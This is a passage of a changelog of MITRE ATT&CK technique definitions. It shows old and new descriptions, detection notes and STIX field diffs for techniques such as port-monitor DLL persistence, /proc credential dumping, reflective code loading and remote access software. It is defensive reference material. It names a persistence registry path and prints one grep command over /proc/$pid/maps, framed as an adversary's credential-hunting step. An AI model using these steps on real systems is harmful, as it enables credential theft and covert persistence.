Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the `AddMonitor` API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in `C:\Windows\System32` and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`.

The Registry key contains entries for the following:

* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

New Description:

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the `AddMonitor` API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in `C:\Windows\System32` and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham)

Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. The Registry key contains entries for the following:

* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-04-20 16:36:31.835000+00:00 | 2024-04-12 02:49:39.980000+00:00 |
| description | Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. | Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_detection | Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns) | Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors, paying particular attention to changes in the "Driver" subkey. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns) |
| x_mitre_version | 1.1 | 1.2 |

iterable_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_contributors | | Harun Küßner |

[T1059.001] Command and Scripting Interpreter: PowerShell

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-27 17:19:48.136000+00:00 | 2024-03-01 18:01:37.575000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.3 | 1.4 |

[T1542] Pre-OS Boot

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-04-19 02:50:42.074000+00:00 | 2024-02-26 14:26:14.364000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |

[T1003.007] OS Credential Dumping: Proc Filesystem

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)

If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

New Description:

Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as `grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1`, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)

If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-04-15 01:16:25.566000+00:00 | 2024-04-10 16:41:01.496000+00:00 |
| description | Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022) When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook) If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located. | Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022) When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as `grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps \| cut -d' ' -f 1`, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook) If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located. |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_detection | To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\*/maps, where the \* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs. | To obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc/PID/maps`, where the `PID` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs. |
| x_mitre_version | 1.1 | 1.2 |

iterable_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| external_references | | {'source_name': 'atomic-red proc file system', 'description': 'Atomic Red Team. (2023, November). T1003.007 - OS Credential Dumping: Proc Filesystem. Retrieved March 28, 2024.', 'url': 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md'} |

[T1057] Process Discovery

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description:

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `Get-Process` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)

New Description:

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or `Get-Process` via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
Details
dictionary_item_removed

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_system_requirements | ['Administrator, SYSTEM may provide better process ownership details'] | |

values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-08-11 21:40:56.448000+00:00 | 2024-04-16 12:43:55.369000+00:00 |
| description | Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) | Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via `/proc`. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |

[T1037.004] Boot or Logon Initialization Scripts: RC Scripts

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |

values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-04-27 19:58:01.927000+00:00 | 2024-04-16 12:22:29.150000+00:00 |
| x_mitre_version | 2.0 | 2.1 |

iterable_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_platforms | | Network |

[T1620] Reflective Code Loading

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)

Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)

New Description:

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).

Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)

Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)
Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-09-29 21:09:49.267000+00:00 | 2024-02-09 18:49:08.428000+00:00 |
| description | Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) | Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)). Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) |
| x_mitre_version | 1.1 | 1.2 |

iterable_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| external_references | | {'source_name': 'Microsoft AssemblyLoad', 'description': 'Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024.', 'url': 'https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load'} |
| x_mitre_contributors | | Jiraput Thamsongkrah |

[T1219] Remote Access Software

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).

New Description

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)

New Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-09-28 16:23:51.194000+00:00 | 2024-04-12 23:52:30.489000+00:00
description | (old text above) | (new text above)
x_mitre_version | 2.2 | 2.3
iterable_item_added
STIX Field | New value
external_references | {'source_name': 'Google Chrome Remote Desktop', 'description': 'Google. (n.d.). Retrieved March 14, 2024.', 'url': 'https://support.google.com/chrome/answer/1649523'}
external_references | {'source_name': 'Chrome Remote Desktop', 'description': 'Huntress. (n.d.). Retrieved March 14, 2024.', 'url': 'https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708'}
x_mitre_contributors | Dray Agha, @Purp1eW0lf, Huntress Labs

[T1563] Remote Service Session Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Details
dictionary_item_added
STIX Field | New value
x_mitre_attack_spec_version | 3.2.0
x_mitre_deprecated | False
dictionary_item_removed
STIX Field | Old value
x_mitre_permissions_required | ['SYSTEM', 'root']
values_changed
STIX Field | Old value | New value
modified | 2020-03-23 23:35:58.129000+00:00 | 2024-02-26 14:21:37.818000+00:00
x_mitre_version | 1.0 | 1.1

[T1021] Remote Services

Current version: 1.5

Version changed from: 1.4 → 1.5

New Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-06-02 15:31:40.498000+00:00 | 2024-03-01 15:35:38.299000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.4 | 1.5

[T1496] Resource Hijacking

Current version: 1.5

Version changed from: 1.4 → 1.5

New Detections:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-10-02 01:11:32.822000+00:00 | 2024-02-14 21:00:00.467000+00:00
external_references[2]['url'] | https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc | https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
x_mitre_version | 1.4 | 1.5
iterable_item_added
STIX Field | New value
x_mitre_data_sources | Network Traffic: Network Traffic Content

[T1606.002] Forge Web Credentials: SAML Tokens

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-09-19 21:25:46.568000+00:00 | 2024-03-01 17:55:56.116000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | New value
x_mitre_data_sources | Process: Process Creation

[T1053.005] Scheduled Task/Job: Scheduled Task

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX Field | Old value | New value
modified | 2023-08-11 21:20:10.882000+00:00 | 2023-11-15 14:33:53.354000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.4 | 1.5

[T1053] Scheduled Task/Job

Current version: 2.3

Version changed from: 2.2 → 2.3

New Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-03-30 21:01:52.697000+00:00 | 2024-03-01 15:29:46.832000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.2.0
x_mitre_version | 2.2 | 2.3

[T1518.001] Software Discovery: Security Software Discovery

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), `reg query` with [Reg](https://attack.mitre.org/software/S0075), `dir` with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the `DescribeSecurityGroups` action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)

New Description

Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), `reg query` with [Reg](https://attack.mitre.org/software/S0075), `dir` with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.

Adversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents may collect metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-21 12:30:00.939000+00:00 | 2024-04-16 00:15:53.303000+00:00
description | (old text above) | (new text above)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.4 | 1.5
iterable_item_removed
STIX Field | Old value
external_references | {'source_name': 'Expel IO Evil in AWS', 'description': 'A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.', 'url': 'https://expel.io/blog/finding-evil-in-aws/'}
external_references | {'source_name': 'DescribeSecurityGroups - Amazon Elastic Compute Cloud', 'description': 'Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022.', 'url': 'https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html'}
x_mitre_platforms | Azure AD
x_mitre_platforms | Office 365
x_mitre_platforms | SaaS
x_mitre_platforms | Google Workspace

[T1555.002] Credentials from Password Stores: Securityd Memory

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)

New Description

An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s `securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)

Details
dictionary_item_added
STIX Field | New value
x_mitre_attack_spec_version | 3.2.0
x_mitre_deprecated | False
dictionary_item_removed
STIX Field | Old value
x_mitre_permissions_required | ['root']
values_changed
STIX Field | Old value | New value
modified | 2022-03-08 21:43:20.609000+00:00 | 2024-03-29 16:37:34.772000+00:00
description | (old text above) | (new text above)
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | New value
external_references | {'source_name': 'Apple Dev SecurityD', 'description': 'Apple. (n.d.). Security Server and Security Agent. Retrieved March 29, 2024.', 'url': 'https://developer.apple.com/library/archive/documentation/Security/Conceptual/Security_Overview/Architecture/Architecture.html'}

[T1583.004] Acquire Infrastructure: Server

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

